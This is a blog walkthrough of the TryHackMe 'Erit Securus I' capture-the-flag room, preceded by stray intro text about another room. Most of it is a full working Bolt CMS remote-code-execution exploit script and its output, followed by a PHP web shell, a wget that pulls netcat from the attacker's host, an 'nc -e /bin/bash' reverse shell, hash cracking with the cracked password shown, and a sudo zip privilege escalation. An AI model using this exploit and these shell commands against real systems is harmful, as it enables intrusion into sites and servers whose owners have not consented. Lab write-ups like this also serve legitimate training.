The platform develops virtual
classrooms that not only allow users to deploy training environments with the
click of a button, but also reinforce learning by adding a question-answer
approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Erit Securus I walkthrough
While using a question-answer model
does make learning easier, TryHackMe allows users to create their own virtual
classrooms to teach particular topics enabling them to become teachers. This
not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
It seems like our machine got hacked by an anonymous threat actor.
However, we are lucky to have a .pcap file from the attack. Can you determine
what happened? Download the .pcap file and use Wireshark to view it. TryHackMe h4cked walkthrough
Let's Start
we can run a simple nmap scan to look for open ports and services -
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme] └─$ sudo nmap -A -T4 -Pn -sV -vv 10.10.108.118 [sudo] password for hackerboy: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 16:05 IST NSE: Loaded 153 scripts for scanning. Initiating NSE at 16:05 Completed NSE at 16:05, 0.00s elapsed Scanning 10.10.108.118 [1000 ports] Discovered open port 22/tcp on 10.10.108.118 Discovered open port 80/tcp on 10.10.108.118 Completed SYN Stealth Scan at 16:05, 6.47s elapsed (1000 total ports) Retrying OS detection (try #3) against 10.10.108.118 Completed NSE at 16:05, 0.00s elapsed Nmap scan report for 10.10.108.118 Host is up, received user-set (0.23s latency). Scanned at 2021-05-26 16:05:04 IST for 49s Not shown: 998 closed ports Reason: 998 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0) | ssh-hostkey: | 1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAPWmD4IaPbJQU46GEKX8pUal0IbZzIykktEuUh5boCKMuwsetNGanzNZYFd6eGWRd+zqr6nRnRFQPDiDZtt6DDz7NcJcXliGifQehWEEmskzfhdGSuh+kBUQaqXskCKZi0U/l9P0kvP6bD2SdsXqiYTBGQxN6a4Do1fyE2OoVYgPAAAAFQD4r+hmmsHGFfn0SV1mjGpoHpFwuwAAAIAnnoGwYiWDRAwFoPLkLYWahNwCbLAhVXOb1cnr8NxZN+uRMqEdtoZHNUbTd7ki8j5WpkZhMjFEyZQJg+MNQjUSxISlE1SoBTI8BmAUDAEvgPNyr0CDCS42rAY98JTMhaoZ8FOzgoatLmJWWgWqM+8YHCN4XHoVgm1vMagLsWxW5AAAAIBGW3tnTGis3+eWROnisRfyoo3zawOnd7oijjK7CAiIuxfqc3ESTzeLlkL0QBAIv/1PBGoZSTwg53aZqctO2/BgSNGMWDts3xnqpsEGNyo520Br/cBUyi6rRBotV1kL9tIT4VwdP33F/bjiHHRclfCmOtVYWmkst+HUSqS2yPn1WQ== | 2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0zYWd7C1JANU5TctI7lB/tyS9Aid6x5Dh2PnD7fpz6C9Apv9Y/YJzaCUYgqME41ZDxIIiegV02OSCkKFmXvr9gVVKaFHyUVhQ9Zb3FyQeGgWEL3004HIL+G06afXPlsRzNBb5VoqUte+5bigJT5UkyncAfWn+8bWLnFmuXDi5PZ4Pz0RHx9HzCwJ5G26DogQUI6M0zQkhJHzD+nWdIExvoY1L9UN4oZzCuaUF3Tcel3dDnbgi1RaZlfFi3r5NNUtQ7OVijWnms7nYNN7b77CZZWMhE6yMYI8+3ya99CfzA/oYsHv+t8XSbRyAdm5KvETrD8yoBrE14F2FekQQNggx | 256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAOH4ypeTzhthRbvcrzqVbbWXG1imFdejEQIo53fimAkjsOcrmEDWwT7Lskm5qyz4dmhGmfsH90xzOgQ+Bm6Nuk= | 256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7iJO0KhscqLrJgy+mvB3Y+5U+WpOiBAxCr4TKu7pJB 80/tcp open http syn-ack ttl 63 nginx 1.6.2 |_http-generator: Bolt | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.6.2 |_http-title: Graece donan, Latine voluptatem vocant. | Erit Securus 1 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=5/26%OT=22%CT=1%CU=33880%PV=Y%DS=2%DC=T%G=Y%TM=60AE248 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Uptime guess: 0.043 days (since Wed May 26 15:03:51 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 993/tcp) HOP RTT ADDRESS 1 264.29 ms 10.8.0.1 2 264.52 ms 10.10.108.118 NSE: Script Post-scanning. Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 50.48 seconds Raw packets sent: 1306 (61.562KB) | Rcvd: 1134 (56.636KB) ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme] └─$
From this result :-
port 22/tcp - SSH (openSSH 6.7p1)
port 80/tcp - HTTP (nginx 1.6.2)
Enumeration
Examine webserver. Identify what web-app is running. The Content management system that the website is built on can ve found in the http-generator field of the nmap scan. This can also be determined by viewing the website via the browser and scrolling to the bottom of the page:-
Exploit
Download
exploit
for this app. The exploit works, but might not fire every time. If you first
don't succeed...
CVE - Exploit
The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution # Date: 2020-04-05 # Exploit Author: r3m0t3nu11 # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.x # Tested on: Linux # CVE : not-yet-0day #!/usr/bin/python import requests import sys import warnings import re import os from bs4 import BeautifulSoup from colorama import init from termcolor import colored init() #pip install -r requirements.txt print(colored(''' ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) if len(sys.argv) != 4: print((len(sys.argv))) print((colored("[~] Usage : ./bolt.py url username password","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') token = soup.findAll('input')[2].get("value") login_info = { "user_login[username]": username, "user_login[password]": password, "user_login[login]": "", "user_login[_token]": token } login_request = request.post(url+"/bolt/login", login_info) print((colored("[+] Login token is : {0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") data_profile = { "user_profile[password][first]":"password", "user_profile[password][second]":"password", "user_profile[email]":"a@a.com", "user_profile[displayname]":"", "user_profile[save]":"", "user_profile[_token]":token0 } profile = request.post(url+'/bolt/profile',data_profile) cache_csrf = request.get(url+"/bolt/overview/showcases") soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") soup2 = BeautifulSoup(asyncc.text, 'html.parser') tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) for all_tables in tables: f= open("session.txt","a+") f.write(all_tables.text+"\n") f.close() num_lines = sum(1 for line in open('session.txt')) renamePostData = { "namespace": "root", "parent": "/app/cache/.sessions", "oldname": all_tables.text, "newname": "../../../public/files/test{}.php".format(num_lines), "token": csrf } rename = request.post(url+"/async/folder/rename", renamePostData) try: url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) rev = requests.get(url1).text r1 = re.findall('php',rev) r2 = r1[0] if r2 == "php" : fileINJ = "test{}".format(num_lines) print((colored("[+] FOUND : "+fileINJ,"green"))) except IndexError: print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) if inputs == "quit" : exit() else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) print((r11)[0])
if you want to renamed first so you can.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ ls 48296.py ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ sudo cp 48296.py exploit.py [sudo] password for hackerboy: ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ ls 48296.py exploit.py ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$
Gaining access
We are ready to run the exploit script against the target:
sudo python3 exploit.py http://<target IP> admin password
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ sudo python3 exploit.py http://10.10.108.118 admin password ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex [+] Retrieving CSRF token to submit the login form [+] Login token is : _AJfPiYG9NweZWcPHp4VBBTPffsYer938Wn9Dad6qho [+] SESSION INJECTION [-] Not found. [-] Not found. [-] Not found. [-] Not found. [+] FOUND : test5 [-] Not found. [-] Not found. [-] Not found. [-] Not found. [-] Not found. [-] Not found. [-] Not found. [-] Not found. [-] Not found. [+] FOUND : test15 [-] Not found. Enter OS command , for exit 'quit' :
Now we have access, we can create a simple PHP shell on the
server:
echo '<?php system($_GET["cmd"]);?>'>cmd.php
[-] Not found. [-] Not found. [+] FOUND : test15 [-] Not found. Enter OS command , for exit 'quit' : id uid=33(www-data) gid=33(www-data) groups=33(www-data) ";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}} Enter OS command , for exit 'quit' :
Enter OS command , for exit 'quit' : echo ''>cmd.php ";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}} Enter OS command , for exit 'quit' :
This can then be used to upload a netcat reverse shell (as there is no
netcat on the target machine). First, we will need to create a symbolic link
to netcat on our local machine to the current directory on the target. Run
this command via a local terminal:
ln -s $(which nc) .
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ ln -s $(which nc) . ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$ ls 48296.py exploit.py nc session.txt ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit] └─$
A simple web server can then be started locally in order to serve the file to the target:
Using the PHP shell we are able to download netcat to the target via the
browser:
http://10.10.108.118/files/cmd.php?cmd=wget
http://<local-IP>:8080/nc
The file will be transferred to the same directory as the PHP shell. We can
make the uploaded netcat file executable by browsing to:
http://10.10.108.118/files/cmd.php?cmd=chmod 755 nc
Next, we need to start a netcat listener on our local machine:-
nc -nvlp 1234
Finally, we can trigger this connection via the browser to get our reverse shell:
http://10.10.108.118/files/cmd.php?cmd=./nc -e /bin/bash
<local-IP> 1234
Our reverse shell can then be upgraded to a fully interactive TTY shell
by running:
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Erit:/var/www/html/public/files$ ls ls cmd.php placeholder_ecff05026ae6.jpg test25.php index.html test1.php test26.php nc test10.php test27.php placeholder_07f6539b3d7d.jpg test11.php test28.php placeholder_0a23551a8097.jpg test12.php test29.php placeholder_0aa7e8852e11.jpg test13.php test3.php placeholder_1fad82e5eac1.jpg test14.php test30.php placeholder_20001088e915.jpg test15.php test31.php placeholder_46f89a97453b.jpg test16.php test32.php placeholder_6a843969b527.jpg test17.php test33.php placeholder_7c21b25839bd.jpg test18.php test4.php placeholder_84f5c9d2e2c2.jpg test19.php test5.php placeholder_8a7754ace050.jpg test2.php test6.php placeholder_8ec2add549d6.jpg test20.php test7.php placeholder_9cf46a03a9c3.jpg test21.php test8.php placeholder_aa536d42187b.jpg test22.php test9.php placeholder_addfa01cba49.jpg test23.php placeholder_c45564b83b31.jpg test24.php www-data@Erit:/var/www/html/public/files$
Privilege Escalation
In the /app/database directory you will find the database file:
bolt.db
cd ../../app/database
ls
www-data@Erit:/var/www/html/public/files$ cd ../../app/database cd ../../app/database www-data@Erit:/var/www/html/app/database$ pwd pwd /var/www/html/app/database www-data@Erit:/var/www/html/app/database$ ls ls bolt.db www-data@Erit:/var/www/html/app/database$
The type of database can be determined by running: file bolt.db
www-data@Erit:/var/www/html/app/database$ file bolt.db file bolt.db bolt.db: SQLite 3.x database, last written using SQLite version 3020001 www-data@Erit:/var/www/html/app/database$
We can access this SQLite 3.x database and run the
.tables command to display the database tables:
www-data@Erit:/var/www/html/app/database$ sqlite3 bolt.db sqlite3 bolt.db SQLite version 3.16.2 2017-01-06 16:32:41 Enter ".help" for usage hints. sqlite> sqlite> .tables .tables bolt_authtoken bolt_field_value bolt_pages bolt_blocks bolt_homepage bolt_relations bolt_content_changelog bolt_log bolt_showcases bolt_cron bolt_log_change bolt_taxonomy bolt_entries bolt_log_system bolt_users sqlite> www.kumaratuljaiswal.in
The bolt_users table looks interesting, let's
have a look at that:
SELECT * FROM bolt_users;
sqlite> SELECT * FROM bolt_users; SELECT * FROM bolt_users; 1|admin|$2y$10$0Z2xl2fs/9xe2HVEkqDZZ.COwXKfHtxsyT5qdHXuJB3XgR7TzeZQi||0|a@a.com|2021-05-26 05:47:53|192.168.100.1|[]|1|||||["root","everyone"] 2|wildone|$2y$10$ZZqbTKKlgDnCMvGD2M0SxeTS3GPSCljXWtd172lI2zj3p6bjOCGq.|Wile E Coyote|0|wild@one.com|2020-04-25 16:03:44|192.168.100.1|[]|1|||||["editor"] sqlite> www.kumaratuljaiswal.in
Two users are listed - admin and wildone (Wile E Coyote). There is also an IP address of 192.168.100.1, which
might come in handy later.
We're already admin, so let's try
and crack the hash of wildone using JohnTheRipper and the
rockyou wordlist.
First, copy the hash to a file and then run:
we got it -
Once this completes, run the following to view the password, If the
password is not visible
john --show hash.txt
This allows us to switch user to wileec and obtain the first
flag:
Then, quit in sqlite -
.quit
change the user su wileec with password : snickers
This allows us to switch user to wileec and obtain the first
flag:
sqlite> .quit .quit www-data@Erit:/var/www/html/app/database$ su wileec su wileec Password: snickers $ whoami whoami wileec $ ls ls bolt.db $ cd ~ cd ~ $ ls ls flag1.txt $ cat flag1.txt cat flag1.txt THM{Hey!_Welcome_in} $
Pivoting
It appears that wileec also has an ssh private key:
ls -la
cd .ssh
$ ls -la ls -la total 28 drwxr-xr-x 4 wileec wileec 4096 Apr 25 2020 . drwxr-xr-x 4 root root 4096 Apr 25 2020 .. -rw-r--r-- 1 wileec wileec 220 May 15 2017 .bash_logout -rw-r--r-- 1 wileec wileec 3526 May 15 2017 .bashrc -rw-r--r-- 1 wileec wileec 675 May 15 2017 .profile drwxr-xr-x 2 wileec wileec 4096 Apr 25 2020 .ssh -rw-r--r-- 1 root root 21 Apr 25 2020 flag1.txt $ cd .ssh cd .ssh $ ls -la ls -la total 20 drwxr-xr-x 2 wileec wileec 4096 Apr 25 2020 . drwxr-xr-x 4 wileec wileec 4096 Apr 25 2020 .. -rw------- 1 wileec wileec 1675 Apr 25 2020 id_rsa -rw-r--r-- 1 wileec wileec 393 Apr 25 2020 id_rsa.pub -rw-r--r-- 1 wileec wileec 222 Apr 25 2020 known_hosts $ www.kumaratuljaiswal.in
We can use this to try connecting using the
internal IP address we found in the bolt_users table of
the SQLite database:
Great, it worked... and, even better, we have some sudo privileges:
sudo -l
Privilege Escalation #2
We can use the /usr/bin/zip binary to elevate our privileges once again to become user jsmith:
TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
$ sudo -l sudo -l Matching Defaults entries for wileec on Securus: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User wileec may run the following commands on Securus: (jsmith) NOPASSWD: /usr/bin/zip $ $ TF=$(mktemp -u) TF=$(mktemp -u) $ sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #' sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 32%) $
Awesome! We are now jsmith.
Once again, we can upgrade to a
fully interactive shell:
python -c 'import pty;pty.spawn("/bin/bash")'
$ python -c 'import pty;pty.spawn("/bin/bash")' python -c 'import pty;pty.spawn("/bin/bash")' jsmith@Securus:/home/wileec$ whoami whoami jsmith jsmith@Securus:/home/wileec$ #www.kumaratuljaiswal.in #www.kumaratuljaiswal.in jsmith@Securus:/home/wileec$ cd ~ cd ~ jsmith@Securus:~$ ls -la ls -la total 24 drwxrwx--- 2 jsmith jsmith 4096 Apr 25 2020 . drwxr-xr-x 4 root root 4096 Apr 26 2020 .. -rw-r--r-- 1 jsmith jsmith 220 Nov 5 2016 .bash_logout -rw-r--r-- 1 jsmith jsmith 3515 Nov 5 2016 .bashrc -rw-r--r-- 1 jsmith jsmith 33 Apr 25 2020 flag2.txt -rw-r--r-- 1 jsmith jsmith 675 Nov 5 2016 .profile jsmith@Securus:~$ jsmith@Securus:~$ cat flag2.txt cat flag2.txt THM{Welcome_Home_Wile_E_Coyote!} jsmith@Securus:~$
jsmith@Securus:~$ sudo -l sudo -l Matching Defaults entries for jsmith on Securus: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jsmith may run the following commands on Securus: (ALL : ALL) NOPASSWD: ALL jsmith@Securus:~$
Next, we can change to the users home directory and grab the second flag:
jsmith@Securus:~$ sudo su sudo su root@Securus:/home/jsmith# whoami whoami root root@Securus:/home/jsmith# ls -la ls -la total 24 drwxrwx--- 2 jsmith jsmith 4096 Apr 25 2020 . drwxr-xr-x 4 root root 4096 Apr 26 2020 .. -rw-r--r-- 1 jsmith jsmith 220 Nov 5 2016 .bash_logout -rw-r--r-- 1 jsmith jsmith 3515 Nov 5 2016 .bashrc -rw-r--r-- 1 jsmith jsmith 33 Apr 25 2020 flag2.txt -rw-r--r-- 1 jsmith jsmith 675 Nov 5 2016 .profile root@Securus:/home/jsmith# #www.kumaratuljaiswal.in #www.kumaratuljaiswal.in root@Securus:/home/jsmith# root@Securus:/home/jsmith# cd /root cd /root root@Securus:~# ls -la ls -la total 28 drwx------ 4 root root 4096 Apr 26 2020 . drwxr-xr-x 22 root root 4096 Apr 17 2020 .. lrwxrwxrwx 1 root root 9 Apr 22 2020 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc -rw-r--r-- 1 root root 43 Apr 25 2020 flag3.txt drwx------ 2 root root 4096 Apr 23 2020 .gnupg -rw-r--r-- 1 root root 140 Nov 19 2007 .profile drwx------ 2 root root 4096 Apr 17 2020 .ssh root@Securus:~# cat flag3.txt cat flag3.txt THM{Great_work!_You_pwned_Erit_Securus_1!} root@Securus:~#
Disclaimer
This was written for educational purpose and pentest only.
The author
will not be responsible for any damage ..!
The author of this tool is not
responsible for any misuse of the information.
You will not misuse the
information to gain unauthorized access.
This information shall only be
used to expand knowledge and not for causing malicious or damaging
attacks. Performing any hacks without written permission is illegal ..!
All
video’s and tutorials are for informational and educational purposes only. We
believe that ethical hacking, information security and cyber security should
be familiar subjects to anyone using digital information and computers. We
believe that it is impossible to defend yourself from hackers without knowing
how hacking is done. The tutorials and videos provided on www.hackingtruth.in
is only for those who are interested to learn about Ethical Hacking, Security,
Penetration Testing and malware analysis. Hacking tutorials is against misuse
of the information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word is
used.
All tutorials and videos have been made using our own
routers, servers, websites and other resources, they do not contain any
illegal activity. We do not promote, encourage, support or excite any illegal
activity or hacking without written permission in general. We want to raise
security awareness and inform our readers on how to prevent themselves from
being a victim of hackers. If you plan to use the information for illegal
purposes, please leave this website now. We cannot be held responsible for any
misuse of the given information.
- Hacking Truth by
Kumar Atul Jaiswal
I hope you liked this post, then you
should not forget to share this post at all.
Thank you so much :-)